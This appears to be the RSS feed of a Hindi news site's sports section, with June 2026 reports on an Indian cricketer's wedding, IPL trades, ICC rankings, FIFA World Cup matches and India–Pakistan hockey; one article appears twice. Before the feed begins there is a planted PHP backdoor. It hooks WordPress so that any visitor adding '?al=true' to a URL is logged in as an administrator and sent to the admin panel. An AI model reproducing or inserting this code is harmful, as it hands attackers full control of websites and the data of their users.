// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); खेल – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Thu, 25 Jun 2026 07:08:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.4 दूल्हा बने आकाशदीप, आशीर्वाद देने पहुंचे पवन सिंह; क्रिकेटर ने कहा- शुक्रिया https://pratyushaashakinayikiran.com/?p=229355 Thu, 25 Jun 2026 07:08:00 +0000 https://pratyushaashakinayikiran.com/?p=229355 काशी
रतीय क्रिकेट टीम के स्टार तेज गेंदबाज आकाशदीप सिंह बुधवार को काशी में अपनी मंगेतर अक्षिता राज के साथ शादी के अटूट बंधन में बंध गए हैं. वाराणसी के फाइव स्टार होटल में आयोजित शादी में परंपराओं और आधुनिक भव्यता का एक अनूठा संगम देखने को मिला. आकाशदीप की जिंदगी के अहम दिन पर खेल, राजनीति और मनोरंजन जगत की कई बड़ी हस्तियां शरीक हुईं. सभी ने कपल को नए सफर की शुभकामनाएं दीं।  

भोजपुरी पावर स्टार पवन सिंह भी आकाशदीप और अक्षिता की शादी में रंग जमाने पहुंचे. उन्होंने शादी में जमकर डांस करने के अलावा न्यूली मैरिड कपल को बधाई दी। 

पवन सिंह ने जमाया रंग 
सोशल मीडिया पर आकाशदीप की वेडिंग फोटोज और वीडियोज धल्लड़े से वायरल हो रहे हैं. एक फोटो में पवन सिंह न्यूली मैरिड के साथ पोज देते नजर आ रहे हैं. पवन सिंह जिस तरह क्रिकेटर की शादी का हिस्सा बने, उसे देखकर साफ पता चल रहा है कि वो आकाशदीप से काफी क्लोज बॉन्ड शेयर करते हैं. आकाशदीप ने भी पवन सिंह के स्वागत में किसी तरह की कमी नहीं रखी. वो स्टेज पर पवन सिंह का वेलकम करते दिखे। 

यही नहीं आकाशदीप ने वेडिंग डे पर पवन सिंह की जमकर तारीफ भी की. क्रिकेटर ने कहा कि आप ने जिस तरह भोजपुरी को आगे लेकर गए, आज हम लोगों को हर जगह सम्मान और गर्व मिलता है. ये सिर्फ और सिर्फ आपकी वजह से है. इसके लिए आपका बहुत-बहुत धन्यवाद. बहुत सौभाग्यशाली हूं. आपको अपनी जिंदगी में सुन पाया, ये बहुत बड़ी बात है। 
 
जवाब में पवन सिंह ने कहा कि मैं सिर्फ यही जानता हूं और कहना चाहूंगा, आकाश मेरे प्यारे भाई आपके बडे़ भाई होने के नाते यही कहूंगा कि इतने लोगों के बीच में नो थैंक्यू, नो धन्यवाद सिर्फ लव यू. इसके बाद दोनों एक-दूसरे को गले लगा लेते हैं। 

क्रिकेटर की शादी में पवन सिंह को देखकर उनके चाहने वालों की खुशी का ठिकाना नहीं रहा. एक ने लिखा कि भोजपुरी सिनेमा और इंडियन क्रिकेटर का मिलन उम्मीद से परे है. अन्य ने लिखा कि पवन भइया किंग. कई लोगों ने फायर लिखा और कुछ ने कहा कि पवन सिंह का कोई जोड़ नहीं है। 

बता दें कि आकाशदीप और उनकी दुल्हन अक्षिता राज बिहार के सासाराम के रहने वाले हैं. इस वजह से पवन सिंह से उनका गहरा संबंध है। 
 

]]>
दूल्हा बने आकाशदीप, आशीर्वाद देने पहुंचे पवन सिंह; क्रिकेटर ने कहा- शुक्रिया https://pratyushaashakinayikiran.com/?p=229357 Thu, 25 Jun 2026 07:08:00 +0000 https://pratyushaashakinayikiran.com/?p=229357 काशी
रतीय क्रिकेट टीम के स्टार तेज गेंदबाज आकाशदीप सिंह बुधवार को काशी में अपनी मंगेतर अक्षिता राज के साथ शादी के अटूट बंधन में बंध गए हैं. वाराणसी के फाइव स्टार होटल में आयोजित शादी में परंपराओं और आधुनिक भव्यता का एक अनूठा संगम देखने को मिला. आकाशदीप की जिंदगी के अहम दिन पर खेल, राजनीति और मनोरंजन जगत की कई बड़ी हस्तियां शरीक हुईं. सभी ने कपल को नए सफर की शुभकामनाएं दीं।  

भोजपुरी पावर स्टार पवन सिंह भी आकाशदीप और अक्षिता की शादी में रंग जमाने पहुंचे. उन्होंने शादी में जमकर डांस करने के अलावा न्यूली मैरिड कपल को बधाई दी। 

पवन सिंह ने जमाया रंग 
सोशल मीडिया पर आकाशदीप की वेडिंग फोटोज और वीडियोज धल्लड़े से वायरल हो रहे हैं. एक फोटो में पवन सिंह न्यूली मैरिड के साथ पोज देते नजर आ रहे हैं. पवन सिंह जिस तरह क्रिकेटर की शादी का हिस्सा बने, उसे देखकर साफ पता चल रहा है कि वो आकाशदीप से काफी क्लोज बॉन्ड शेयर करते हैं. आकाशदीप ने भी पवन सिंह के स्वागत में किसी तरह की कमी नहीं रखी. वो स्टेज पर पवन सिंह का वेलकम करते दिखे। 

यही नहीं आकाशदीप ने वेडिंग डे पर पवन सिंह की जमकर तारीफ भी की. क्रिकेटर ने कहा कि आप ने जिस तरह भोजपुरी को आगे लेकर गए, आज हम लोगों को हर जगह सम्मान और गर्व मिलता है. ये सिर्फ और सिर्फ आपकी वजह से है. इसके लिए आपका बहुत-बहुत धन्यवाद. बहुत सौभाग्यशाली हूं. आपको अपनी जिंदगी में सुन पाया, ये बहुत बड़ी बात है। 
 
जवाब में पवन सिंह ने कहा कि मैं सिर्फ यही जानता हूं और कहना चाहूंगा, आकाश मेरे प्यारे भाई आपके बडे़ भाई होने के नाते यही कहूंगा कि इतने लोगों के बीच में नो थैंक्यू, नो धन्यवाद सिर्फ लव यू. इसके बाद दोनों एक-दूसरे को गले लगा लेते हैं। 

क्रिकेटर की शादी में पवन सिंह को देखकर उनके चाहने वालों की खुशी का ठिकाना नहीं रहा. एक ने लिखा कि भोजपुरी सिनेमा और इंडियन क्रिकेटर का मिलन उम्मीद से परे है. अन्य ने लिखा कि पवन भइया किंग. कई लोगों ने फायर लिखा और कुछ ने कहा कि पवन सिंह का कोई जोड़ नहीं है। 

बता दें कि आकाशदीप और उनकी दुल्हन अक्षिता राज बिहार के सासाराम के रहने वाले हैं. इस वजह से पवन सिंह से उनका गहरा संबंध है। 
 

]]>
FIFA World Cup में मेक्सिको का जलवा, हैती ने जीता दिल और स्विट्जरलैंड ने भी मारी बाजी https://pratyushaashakinayikiran.com/?p=229307 Thu, 25 Jun 2026 06:57:00 +0000 https://pratyushaashakinayikiran.com/?p=229307 मैक्सिको 
फीफा वर्ल्ड कप 2026 (FIFA World Cup 2026) के ग्रुप राउंड के मुकाबलों में गुरुवार को कई यादगार नतीजे देखने को मिले. मैक्सिको ने चेक रिपब्लिक को 3-0 से हराकर पहली बार वर्ल्ड कप के ग्रुप स्टेज के तीनों मैच जीतने का कारनामा किया. वहीं 52 साल बाद वर्ल्ड कप में लौटी हैती की टीम मोरक्को से हार गई, लेकिन दो गोल दागकर अपने फैन्स को जश्न मनाने का मौका दे गई। 

उधर स्विट्जरलैंड ने कनाडा को 2-1 से हराकर ग्रुप-B में पहला स्थान हासिल किया, जबकि बोस्निया-हर्जेगोविना ने कतर को 3-1 से हराकर नॉकआउट राउंड में पहुंचने की उम्मीदों को मजबूत कर लिया। 

मैक्सिको ने पहली बार जीते ग्रुप स्टेज के तीनों मैच
ग्रुप-A का विजेता पहले ही बन चुका मैक्सिको चेक रिपब्लिक के खिलाफ भी पूरी तरह हावी रहा. दूसरे हाफ में 22 वर्षीय मातेओ चावेज ने 55वें मिनट में गोल कर टीम को बढ़त दिलाई. इसके छह मिनट बाद जूलियन क्विनोनेस ने टूर्नामेंट का अपना दूसरा गोल दागकर स्कोर 2-0 कर दिया। 

इंजरी टाइम में अल्वारो फिडाल्गो ने तीसरा गोल कर जीत पर मुहर लगा दी. मैक्सिको ने पहली बार वर्ल्ड कप के ग्रुप राउंड में तीनों मुकाबले जीते हैं. इससे पहले उसका सर्वश्रेष्ठ प्रदर्शन 1986 और 2002 में रहा था, जब टीम ने दो जीत और एक ड्रॉ हासिल किया था। 

इस मुकाबले में 17 वर्षीय गिल्बर्टो मोरा मैक्सिको के लिए वर्ल्ड कप शुरू करने वाले सबसे युवा खिलाड़ी बने. वहीं 40 वर्षीय गोलकीपर गुइलेर्मो ओचोआ ने अपना छठा वर्ल्ड कप खेलकर लियोनेल मेसी और क्रिस्टियानो रोनाल्डो जैसे दिग्गजों की बराबरी कर ली। 

हार के बावजूद हैती के लिए यादगार रहा दिन
52 साल बाद वर्ल्ड कप खेलने उतरी हैती की टीम मोरक्को से 4-2 से हार गई, लेकिन उसके दो गोल पूरे देश के लिए गर्व का कारण बन गए। 

10वें मिनट में लेनी जोसेफ के शानदार प्रयास से मोरक्को के गोलकीपर यासीन बूनू के खाते में आत्मघाती गोल दर्ज हुआ और हैती ने बढ़त बना ली. इसके बाद विल्सन इसाडोर ने 43वें मिनट में दूसरा गोल कर टीम को फिर बढ़त दिला दी। 

हालांकि मोरक्को ने लगातार तीन गोल दागकर मैच अपने नाम कर लिया और नॉकआउट राउंड में जगह बना ली. इसके बावजूद हजारों हैती समर्थकों ने पूरी रात अपनी टीम का उत्साह बढ़ाया. हैती के कोच सेबेस्टियन मिग्ने ने कहा कि टीम ने साबित किया कि वह इस मंच पर खेलने की हकदार है और अब 52 साल का इंतजार दोबारा नहीं होना चाहिए। 

स्विट्जरलैंड ने कनाडा की उम्मीदों पर फेरा पानी
ग्रुप-B के निर्णायक मुकाबले में स्विट्जरलैंड ने मेजबान कनाडा को 2-1 से हराकर टॉप पोजीशन हासिल कर ली. दूसरे हाफ की शुरुआत के महज 40 सेकंड बाद रूबेन वर्गास ने गोल कर स्विस टीम को बढ़त दिलाई. इसके बाद 20 वर्षीय जोहान मंजांबी ने 57वें मिनट में गोल कर स्कोर 2-0 कर दिया। 

कनाडा की ओर से प्रॉमिस डेविड ने 76वें मिनट में गोल कर वापसी की कोशिश की, लेकिन टीम बराबरी नहीं कर सकी. हार के बावजूद कनाडा ने पहली बार वर्ल्ड कप के नॉकआउट राउंड में जगह बनाई है. अब उसका मुकाबला राउंड ऑफ-32 में साउथ अफ्रीका से होगा। 

बोस्निया ने बढ़ाई नॉकआउट की उम्मीद
सिएटल में खेले गए मुकाबले में बोस्निया-हर्जेगोविना ने कतर को 3-1 से हराकर टूर्नामेंट में अपनी उम्मीदें जिंदा रखीं. 18 वर्षीय केरिम अलायबेगोविच ने 29वें मिनट में गोल कर टीम को बढ़त दिलाई और वर्ल्ड कप इतिहास के सबसे युवा गोल स्कोररों में शामिल हो गए. इसके बाद कतर के सुल्तान अल-ब्रेक के आत्मघाती गोल ने बोस्निया की बढ़त दोगुनी कर दी। 

कतर ने हसन अल हायडोस के गोल से वापसी की कोशिश की, लेकिन 80वें मिनट में एरमिन माहमिक ने तीसरा गोल कर मुकाबला खत्म कर दिया. तीसरे स्थान पर रहने वाली बोस्निया अब सर्वश्रेष्ठ थर्ड-प्लेस टीमों में शामिल होकर राउंड ऑफ-32 में पहुंचने की मजबूत दावेदार बन गई है। 

]]>
पंत की DC में वापसी, LSG को 3 शब्दों में कहा अलविदा https://pratyushaashakinayikiran.com/?p=229191 Wed, 24 Jun 2026 15:26:00 +0000 https://pratyushaashakinayikiran.com/?p=229191  नई दिल्ली

दिल्ली कैपिटल्स में वापसी तय होने के बाद विकेटकीपर-बल्लेबाज ऋषभ पंत ने लखनऊ सुपर जायंट्स (LSG) के लिए एक छोटा लेकिन भावुक विदाई संदेश साझा किया है। पंत ने अपनी इंस्टाग्राम स्टोरी पर LSG की फेयरवेल पोस्ट को रीशेयर करते हुए सिर्फ तीन शब्द लिखे – Thank You Team. इसी के साथ लखनऊ फ्रेंचाइजी के साथ उनका दो साल का सफर औपचारिक रूप से समाप्त हो गया। 

पंत की यह प्रतिक्रिया उस हाई-प्रोफाइल ट्रेड के बाद आई है, जिसके तहत वह दिल्ली कैपिटल्स में लौट रहे हैं. इस डील में भारतीय टीम के स्टार स्पिनर कुलदीप यादव दिल्ली से लखनऊ सुपर जायंट्स का हिस्सा बने हैं। 

IPL 2025 मेगा ऑक्शन से पहले लखनऊ सुपर जायंट्स ने ऋषभ पंत को 27 करोड़ रुपये की रिकॉर्ड कीमत पर अपने साथ जोड़ा था. उस समय वह IPL इतिहास के सबसे महंगे खिलाड़ी बने थे. फ्रेंचाइजी को उम्मीद थी कि पंत की कप्तानी में टीम खिताब की मजबूत दावेदार बनेगी, लेकिन मैदान पर तस्वीर अलग नजर आई। 

पंत की अगुआई में LSG का प्रदर्शन उम्मीदों पर खरा नहीं उतर सका. IPL 2025 में टीम ने 14 मैचों में छह जीत और आठ हार के साथ सातवें स्थान पर अभियान खत्म किया. इसके बाद IPL 2026 सीजन और भी निराशाजनक रहा, जहां लखनऊ 10 टीमों की पॉइंट टेबल में सबसे नीचे रही. टीम ने 14 मुकाबलों में सिर्फ चार जीत दर्ज कीं। 

बल्लेबाजी में भी पंत अपना सर्वश्रेष्ठ प्रदर्शन नहीं दोहरा सके. IPL 2025 में उन्होंने 14 मैचों में 269 रन बनाए. वहीं IPL 2026 में उनके बल्ले से 312 रन निकले, जिसमें सिर्फ एक अर्धशतक शामिल रहा। 

अब पंत एक बार फिर उस टीम में लौट रहे हैं, जहां से उन्होंने IPL में अपनी पहचान बनाई थी. इस ट्रेड के तहत उनकी सैलरी में भी बड़ी कटौती हुई है. लखनऊ में 27 करोड़ रुपये पाने वाले पंत अब 15 करोड़ रुपये में दिल्ली कैपिटल्स का हिस्सा बनेंगे। 

दिल्ली कैपिटल्स के साथ पंत का रिश्ता काफी पुराना रहा है. उन्होंने 2016 से 2024 के बीच फ्रेंचाइजी के लिए 111 मैच खेले थे. इसके अलावा 2021 से 2024 तक टीम की कप्तानी भी संभाली और 43 मुकाबलों में दिल्ली की अगुआई की। 

दूसरी ओर, इस बड़े ट्रेड के तहत बाएं हाथ के रिस्ट स्पिनर कुलदीप यादव दिल्ली कैपिटल्स छोड़कर लखनऊ सुपर जायंट्स से जुड़ गए हैं. कुलदीप अपनी मौजूदा 13.50 करोड़ रुपये की सैलरी पर ही नई फ्रेंचाइजी का हिस्सा बने हैं। 

ऋषभ पंत की घर वापसी और कुलदीप यादव के लखनऊ जाने से IPL 2027 से पहले दोनों फ्रेंचाइजियों की रणनीति में बड़ा बदलाव देखने को मिलेगा. अब सभी की नजरें इस बात पर रहेंगी कि क्या दिल्ली में लौटकर पंत एक बार फिर अपने पुराने रंग में नजर आते हैं। 

]]>
36 साल का इंतजार खत्म, मैट हेनरी ने रचा इतिहास; बुमराह के साथ बने नंबर-1 टेस्ट गेंदबाज https://pratyushaashakinayikiran.com/?p=229183 Wed, 24 Jun 2026 13:16:00 +0000 https://pratyushaashakinayikiran.com/?p=229183  दुबई

इंग्लैंड के खिलाफ ओवल में खेले गए दूसरे टेस्ट में शानदार प्रदर्शन का इनाम न्यूजीलैंड के अनुभवी तेज गेंदबाज मैट हेनरी को ICC की ताजा टेस्ट रैंकिंग में मिला है. हेनरी ने छह स्थान की छलांग लगाते हुए भारत के स्टार तेज गेंदबाज जसप्रीत बुमराह के साथ संयुक्त रूप से नंबर-1 टेस्ट गेंदबाज बनने का गौरव हासिल कर लिया। 

34 वर्षीय हेनरी ने लंदन के केनिंग्टन ओवल में खेले गए दूसरे टेस्ट मैच में इंग्लैंड की बल्लेबाजी को पूरी तरह ध्वस्त करते हुए कुल 11 विकेट झटके थे. इसी प्रदर्शन की बदौलत वह सीधे रैंकिंग के शीर्ष पर पहुंच गए। 

हेनरी अब 36 साल बाद टेस्ट गेंदबाजी रैंकिंग में नंबर-1 स्थान हासिल करने वाले न्यूजीलैंड के पहले गेंदबाज बन गए हैं. उनसे पहले केवल दो कीवी गेंदबाज ही यह उपलब्धि हासिल कर पाए थे. साल 1947 में जैक कोवी टेस्ट रैंकिंग में टॉप पर पहुंचे थे, जबकि दिग्गज रिचर्ड हैडली ने 1984 से 1990 तक लंबे समय तक नंबर-1 स्थान पर कब्जा जमाए रखा था। 

बुमराह को पीछे छोड़ सकते हैं हेनरी
ताजा रैंकिंग में मैट हेनरी और जसप्रीत बुमराह दोनों के 870-870 रेटिंग पॉइंट हैं. दोनों के बाद ऑस्ट्रेलिया के मिचेल स्टार्क 838 अंकों के साथ तीसरे स्थान पर मौजूद हैं। .

हेनरी के पास इंग्लैंड के खिलाफ नॉटिंघम के ट्रेंट ब्रिज में 25 जून से शुरू होने वाले सीरीज के निर्णायक टेस्ट में शानदार प्रदर्शन कर बुमराह को पीछे छोड़ने का मौका होगा। 

दूसरी ओर बुमराह पिछले साल साउथ अफ्रीका के खिलाफ घरेलू टेस्ट सीरीज के बाद कोई टेस्ट मैच नहीं खेले हैं. उन्हें अफगानिस्तान के खिलाफ एकमात्र टेस्ट के लिए आराम दिया गया था. भारतीय तेज गेंदबाज अगस्त में श्रीलंका दौरे पर होने वाली टेस्ट सीरीज के दौरान फिर लाल गेंद क्रिकेट में वापसी करेंगे।

एटकिंसन टॉप-10 से बाहर, लियोन की वापसी
इंग्लैंड के तेज गेंदबाज गस एटकिंसन दूसरे टेस्ट में नहीं खेल पाए, जिसके कारण उन्हें रैंकिंग में नुकसान उठाना पड़ा. वह टॉप-10 से बाहर हो गए हैं. एटकिंसन के बाहर होने से ऑस्ट्रेलिया के अनुभवी ऑफ स्पिनर नाथन लियोन ने फिर से टॉप-10 गेंदबाजों में जगह बना ली है। 

जो रूट फिर बने नंबर-1 टेस्ट बल्लेबाज
टेस्ट बल्लेबाजों की रैंकिंग में भी बड़ा बदलाव देखने को मिला. इंग्लैंड के स्टार बल्लेबाज जो रूट ने अपने ही साथी खिलाड़ी हैरी ब्रूक को पीछे छोड़ते हुए नंबर-1 स्थान दोबारा हासिल कर लिया। 

हालांकि इंग्लैंड को दूसरे टेस्ट में हार का सामना करना पड़ा, लेकिन रूट ने दोनों पारियों में 46 और 77 रन की उपयोगी पारियां खेलीं. वहीं हैरी ब्रूक ने 24 और 58 रन बनाए. रूट की दो स्थान की छलांग के कारण ब्रूक दूसरे और ऑस्ट्रेलिया के ट्रेविस हेड तीसरे स्थान पर खिसक गए। 

रचिन रवींद्र टॉप-10 में, पंत और कैरी को नुकसान
बल्लेबाजों की रैंकिंग में न्यूजीलैंड के रचिन रवींद्र  को भी फायदा हुआ है. उन्होंने दो स्थान की बढ़त हासिल कर 10वां स्थान अपने नाम कर लिया. इसके चलते ऑस्ट्रेलिया के एलेक्स कैरी 11वें और भारत के ऋषभ पंत 12वें स्थान पर पहुंच गए. रवींद्र ने दूसरे टेस्ट में पहली पारी में 33 रन बनाए थे, जबकि दूसरी पारी में 76 रन की अहम पारी खेली थी। 

वहीं डेरिल मिचेल ने दूसरी पारी में अर्धशतक लगाकर छह स्थान की छलांग लगाई और अब वह 16वें स्थान पर पहुंच गए हैं. ग्लेन फिलिप्स ने अपने टेस्ट करियर का पहला शतक जड़ा, जिसके दम पर वह आठ स्थान ऊपर चढ़कर 31वें स्थान पर पहुंच गए. यह उनके करियर की सर्वश्रेष्ठ टेस्ट रैंकिंग है। 

]]>
दिल्ली कैपिटल्स के स्टार बैटर अभिषेक पोरेल पर गंभीर आरोप, शादी का झांसा देकर संबंध बनाने का दावा https://pratyushaashakinayikiran.com/?p=229093 Wed, 24 Jun 2026 08:46:00 +0000 https://pratyushaashakinayikiran.com/?p=229093 नई दिल्ली
 आईपीएल में दिल्ली कैपिटल्स के लिए खेलने वाले पश्चिम बंगाल के क्रिकेटर अभिषेक पोरेल पर शादी का झांसा देकर शोषण का आरोप लगा है. मंगलवार को एक वरिष्ठ पुलिस अधिकारी ने बताया कि कर्नाटक की एक मेडिकल छात्रा ने हुगली जिले के मोगरा पुलिस स्टेशन में उनके खिलाफ शिकायत दर्ज कराई है. अभिषेक पोरेल इसी जिले के चंदननगर के रहने वाले हैं. सूत्रों के मुताबिक, 23 वर्षीय अभिषेक ने इन आरोपों को गलत बताया है. पता चला है कि अभिषेक अभी बेंगलुरु में हैं। 

पुलिस के अनुसार, शिकायतकर्ता का आरोप है कि वह अभिषेक पोरेल के साथ तीन साल से रिलेशनशिप में थीं और दोनों ने शादी करने का फैसला किया था. हालांकि, डेढ़ साल पहले उनके बीच कुछ समस्याएं पैदा हुईं और मामला पुलिस स्टेशन तक भी पहुंचा, लेकिन उस समय कोई औपचारिक शिकायत दर्ज नहीं कराई गई थी. इस बार, युवती अपनी मां के साथ आई और औपचारिक शिकायत दर्ज कराई। 

मामला सामने आने के बाद हुगली (ग्रामीण) के पुलिस अधीक्षक कुंवर भूषण सिंह ने मोगरा पुलिस स्टेशन का दौरा किया. उन्होंने इंस्पेक्टर-इन-चार्ज सौमेन बिस्वास और डीएसपी (क्राइम) अभिजीत सिंह महापात्रा के साथ मामले पर चर्चा की. पुलिस ने पुष्टि की है कि जांच शुरू हो गई है. एक वरिष्ठ अधिकारी ने कहा, “शिकायत दर्ज कर ली गई है. हमने जांच शुरू कर दी है। 

दिल्ली कैपिटल्स के लिए खेलते हैं अभिषेक
अभिषेक पोरेल को आईपीएल 2025 में दिल्ली कैपिटल्स की टीम में भारतीय क्रिकेटर ऋषभ पंत की जगह खेलने का मौका मिला था. हालांकि, उस सीजन में उन्होंने केवल चार मैच खेले और रन नहीं बना पाए, फिर भी फ्रेंचाइजी ने उन्हें टीम में बनाए रखा. हाल के सीजन में, उन्होंने रन बनाए और एक युवा विकेटकीपर के तौर पर टीम का भरोसा जीता. अभिषेक पोरेल ने आईपीएल के 35 मुकाबलों में 25.63 की औसत के साथ 769 रन बनाए हैं. इस दौरान उनके बल्ले से 4 अर्धशतक निकले हैं. वह 23 लिस्ट-ए मुकाबलों में 43.84 की औसत के साथ 833 रन बना चुके हैं, जबकि 61 टी20 मुकाबलों में 30 की औसत के साथ 1,590 रन जोड़े हैं। 

]]>
टीम इंडिया में इस धुरंधर की एंट्री, आयरलैंड-इंग्लैंड दौरे पर मचाएगा धमाल; चोटिल नीतीश रेड्डी बाहर https://pratyushaashakinayikiran.com/?p=229077 Wed, 24 Jun 2026 07:17:00 +0000 https://pratyushaashakinayikiran.com/?p=229077  नई दिल्ली

आयरलैंड और इंग्लैंड के खिलाफ टी20 सीरीज से पहले भारतीय टीम को तगड़ा झटका लगा है. स्टार ऑलराउंडर नीतीश कुमार रेड्डी चोट के कारण दोनों सीरीज से बाहर हो गए हैं. भारतीय टीम को आयरलैंड के खिलाफ दो टी20 इंटरनेशनल मुकाबले खेले हैं. फिर इंग्लैंड दौरे पर पांच टी20I मैच खेले जाएंगे. इंग्लैंड के खिलाफ भारतीय टीम बाद में तीन मैचों की वनडे सीरीज भी खेलेगी। 

नीतीश कुमार रेड्डी की जगह दाएं हाथ के ऑलराउंडर सूर्यांश शेडगे को आयरलैंड और इंग्लैंड दौरे के लिए भारत की टी20 टीम में शामिल किया गया है. भारतीय क्रिकेट नियंत्रण बोर्ड (BCCI) ने मंगलवार (23 जून) को इसकी आधिकारिक घोषणा की। 

बीसीसीआई के मुताबिक नीतीश कुमार रेड्डी को अफगानिस्तान के खिलाफ 20 जून को आयोजित तीसरे वनडे के बाद बाएं पैर की क्वाड्रिसेप्स (जांघ की मांसपेशी) में परेशानी महसूस हुई थी. मेडिकल जांच के बाद बीसीसीआई की मेडिकल टीम ने उन्हें कुछ समय के लिए रिहैब करने की सलाह दी है, जिसके चलते वह आयरलैंड और इंग्लैंड के खिलाफ टी20 सीरीज में नहीं खेल पाएंगे। 

23 वर्षीय सूर्यांश शेडगे ने हाल ही में श्रीलंका में आयोजित त्रिकोणीय सीरीज में इंडिया-ए के लिए शानदार प्रदर्शन किया था. मध्यक्रम में बल्लेबाजी करते हुए उन्होंने पांच मैचों में 147 रन बनाए थे. इसके अलावा गेंदबाजी में भी योगदान देते हुए पूरे टूर्नामेंट में 23 ओवर फेंके थे.  इंडिया-ए ने श्रीलंका-ए को हराकर वो ट्राई सीरीज अपने नाम की थी। 

सूर्यांश शेडगे ने घरेलू क्रिकेट में भी लगातार प्रभावित किया है. सैयद मुश्ताक अली ट्रॉफी (SMAT) 2024-25 के दौरान मुंबई की खिताबी जीत में उनकी अहम भूमिका रही थी. निचले क्रम में बल्लेबाजी करते हुए उन्होंने 131 रन बनाए थे और उनका स्ट्राइक रेट 251.92 रहा था. उनकी विस्फोटक बल्लेबाजी और उपयोगी गेंदबाजी ने चयनकर्ताओं का ध्यान खींचा। 

आयरलैंड के खिलाफ टी20 सीरीज के लिए भारतीय टीम: श्रेयस अय्यर (कप्तान), तिलक वर्मा (उप-कप्तान), रवि बिश्नोई, अभिषेक शर्मा, सूर्यांश शेडगे, प्रसिद्ध कृष्णा, संजू सैमसन, अक्षर पटेल, हर्षित राणा, ईशान किशन, वॉशिंगटन सुंदर, अर्शदीप सिंह, शिवम दुबे, प्रिंस यादव और वैभव सूर्यवंशी। 

इंग्लैंड के खिलाफ टी20 सीरीज के लिए भारतीय टीम: श्रेयस अय्यर (कप्तान), तिलक वर्मा (उप-कप्तान), रवि बिश्नोई, अभिषेक शर्मा, सूर्यांश शेडगे, प्रसिद्ध कृष्णा, संजू सैमसन, अक्षर पटेल, हर्षित राणा, ईशान किशन, वॉशिंगटन सुंदर, अर्शदीप सिंह, शिवम दुबे, प्रिंस यादव, वैभव सूर्यवंशी और वरुण चक्रवर्ती। 

भारत का आयरलैंड दौरा
• पहला टी20: 26 जून, बेलफास्ट
• दूसरा टी20: 28 जून, बेलफास्ट

भारत का इंग्लैंड दौरा
• 1 जुलाई: पहला टी20, चेस्टर ले स्ट्रीट
• 4 जुलाई: दूसरा टी20, मैनचेस्टर
• 7 जुलाई: तीसरा टी20, नॉटिंघम
• 9 जुलाई: चौथा टी20, ब्रिस्टल
• 11 जुलाई: पांचवां टी20, साउथम्प्टन
• 14 जुलाई: पहला वनडे, बर्मिंघम
• 16 जुलाई: दूसरा वनडे, कार्डिफ
• 19 जुलाई: तीसरा वनडे, लॉर्ड्स

]]>
हॉकी प्रो लीग में भारत ने फिर दी पाकिस्तान को मात, हरमनप्रीत ब्रिगेड की रोमांचक जीत https://pratyushaashakinayikiran.com/?p=229079 Wed, 24 Jun 2026 07:08:00 +0000 https://pratyushaashakinayikiran.com/?p=229079 लंदन

एफआईएच प्रो लीग 2025-26 में भारतीय हॉकी टीम ने पाकिस्तान को एक ब्लॉकबस्टर मुकाबले में 4-3 से हरा दिया. यह मुकाबला 23 जून (मंगलवार) को लंदन के ली वैली हॉकी और टेनिस सेंटर में खेला गया, जहां भारतीय टीम ने जबरदस्त खेल का प्रदर्शन किया. भारत रॉटरडैम लेग में ओलंपिक चैम्पियन नीदरलैंड्स पर जीत हासिल करने के बाद इस मैच में उतरा था। 

भारत की ओर से अभिषेक (22 वें मिनट), नीलकांत शर्मा (24वें मिनट), सुखजीत सिंह (40वें मिनट) और राजिंदर सिंह (52वें मिनट) ने गोल दागे. वहीं पाकिस्तान की ओर से नदीम अहमद (8वें मिनट), कप्तान अबू महमूद (53वें मिनट) और मोइन शकील (60वें मिनट) ने गोल स्कोर किए। 

ऐसा रहा दोनों टीमों के बीच मुकाबला
मुकाबले में पाकिस्तानी टीम ने अप्रत्याशित रूप से बढ़त ले ली थी. पहले क्वार्टर के 8वें मिनट में नदीम अहमद ने पेनल्टी कॉर्नर पर गोल दागा. हालांकि भारतीय टीम ने पहले क्वार्टर ने पूरी तरह दबदबा बनाए रखा और उसके पास गोल करने के कई मौके मिले, लेकिन वो उन्हें भुना नहीं सकी। 

दूसरा क्वार्टर पूरी तरह भारतीय टीम के नाम रहा. इस क्वार्टर के 7वें मिनट में दिलप्रीत सिंह के शॉट पर पाकिस्तानी गोलकीपर ने जोरदार सेव किया, लेकिन रिबाउंड पर अभिषेक ने गेंद को गोलपोस्ट में डालकर भारतीय टीम को 1-1 की बराबरी दिला दी. दो मिनट बाद ही नीलकांत शर्मा ने पाकिस्तानी डिफेंस को भेदते हुए शानदार फील्ड गोल दागा. हाफटाइम तक भारतीय टीम 2-1 से आगे थी। 

तीसरे क्वार्टर में भी भारतीय टीम ने शानदार खेल दिखाया, लेकिन वो एक ही गोल कर सकी. सुखजीत सिंह ने तीसरे क्वार्टर के 10वें मिनट में गोलपोस्ट की ओर पीठ कर गेंद को रिसीव किया, फिर अपनी स्टिक से उसे हवा में उछाला और जोरदार शॉट लगाकर गेंद को गोल में पहुंचा दिया। 

चौथे क्वार्टर में दोनों टीमों ने आक्रामक खेल का नजार पेश किया. इस क्वार्टर के सातवें मिनट में राजिंदर सिंह ने पेनल्टी कॉर्नर पर बेहतरीन गोल किया. कप्तान हरमनप्रीत सिंह ने गेंद को राजिंदर की तरफ पास दिया, जिन्होंने शानदार शॉट लगाकर टीम की लीड 4-1 कर दी. इसके बाद पाकिस्तानी टीम ने दो गोल कर मुकाबले को जरूर रोमांचक बनाया। 

पिछले 10 सालों में भारत का दबदबा
मेन्स हॉकी में भारत और पाकिस्तान के बीच कांटे की टक्कर देखने को मिली है. पाकिस्तान ने 82 मैच जीते हैं जबकि भारत ने 68 मैचों में जीत दर्ज की. हालांकि पिछले 10 वर्षों में भारत का दबदबा रहा है. पिछले 10 वर्षों में दोनों टीमों के बीच हुए मुकाबलों में भारत का पलड़ा भारी है. भारतीय टीम 18 मैचों में पाकिस्तान के खिलाफ अपराजित रही है. इसमें 16 जीत और दो ड्रॉ शामिल हैं। 
